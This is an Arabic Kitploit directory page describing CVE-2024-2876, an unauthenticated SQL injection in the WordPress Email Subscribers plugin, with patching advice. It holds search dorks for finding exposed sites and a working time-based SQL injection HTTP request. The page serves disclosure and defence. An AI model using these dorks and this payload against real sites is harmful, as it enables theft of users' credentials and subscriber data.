Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-2876 — استغلال إثبات المفهوم لثغرة حقن SQL حرجة في إضافة WordPress Email Subscribers. يتضمن تفاصيل الاستغلال وطلب HTTP ودوركس البحث. | Kitploit
أدوات/GitHubGitHub/kernel364/cve-2024-2876
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويب
GitHubkernel364/cve-2024-2876

CVE-2024-2876

استغلال إثبات المفهوم لثغرة حقن SQL حرجة في إضافة WordPress Email Subscribers. يتضمن تفاصيل الاستغلال وطلب HTTP ودوركس البحث.

عرض المستودع
22منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-2876 - ثغرة حقن SQL في إضافة Email Subscribers من Icegram Express

نظرة عامة

CVE-2024-2876 هي ثغرة أمنية حرجة تم اكتشافها في إضافة "Email Subscribers by Icegram Express" لنظام WordPress. تؤثر هذه الثغرة على الإصدارات حتى 5.7.14 وتشكل مخاطر كبيرة على أكثر من 90,000 موقع ويب.

تفاصيل الثغرة

  • CVE-ID: CVE-2024-2876
  • CVSS Score: 9.8 (حرجة)
  • الإصدارات المتأثرة: حتى 5.7.14
  • الإصدار المُصحَّح: 5.7.15 وما فوق

الوصف

الثغرة هي خلل في حقن SQL يسمح للمهاجمين غير المصادَق عليهم بتنفيذ استعلامات SQL خبيثة على قواعد بيانات WordPress المتأثرة. من خلال التلاعب بمدخلات المستخدم التي لا يتم تنظيفها بشكل صحيح، يمكن للمهاجمين استخراج معلومات حساسة مثل أسماء المستخدمين وعناوين البريد الإلكتروني وتجزئات كلمات المرور وقوائم المشتركين.

آلية الاستغلال

يحدث حقن SQL داخل دالة run في صنف IG_ES_Subscribers_Query الخاص بالإضافة، حيث يؤدي التحقق غير الكافي من المدخلات إلى تنفيذ كود SQL غير مصرح به. وهذا يعرض سلامة وسرية البيانات المخزنة في قاعدة بيانات WordPress للخطر.

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

التوصيات

  1. التحديث الفوري: إذا كنت تستخدم إضافة "Email Subscribers by Icegram Express"، فقم بالترقية إلى الإصدار 5.7.15 أو أحدث فورًا لتطبيق الإصلاح الأمني.

  2. التدقيق المنتظم: راجع وحدّث جميع إضافات وقوالب WordPress إلى أحدث إصداراتها بانتظام لضمان الأمان.

  3. الإضافات الأمنية: استخدم إضافات أمان موثوقة لـ WordPress لتعزيز الدفاعات ضد حقن SQL والتهديدات الإلكترونية الأخرى.

  4. سياسات كلمات مرور قوية: نفّذ كلمات مرور قوية وفريدة لجميع الحسابات المرتبطة بموقع WordPress الخاص بك لتقليل مخاطر الوصول غير المصرح به.

تأثير عدم الامتثال

قد يؤدي الفشل في تحديث الإضافة المتأثرة إلى ترك المواقع عرضة لخروقات البيانات والوصول غير المصرح به. ونظرًا للاستخدام الواسع لهذه الإضافة، فإن اتخاذ إجراء فوري أمر بالغ الأهمية لتأمين التثبيتات.

تنزيل الأداة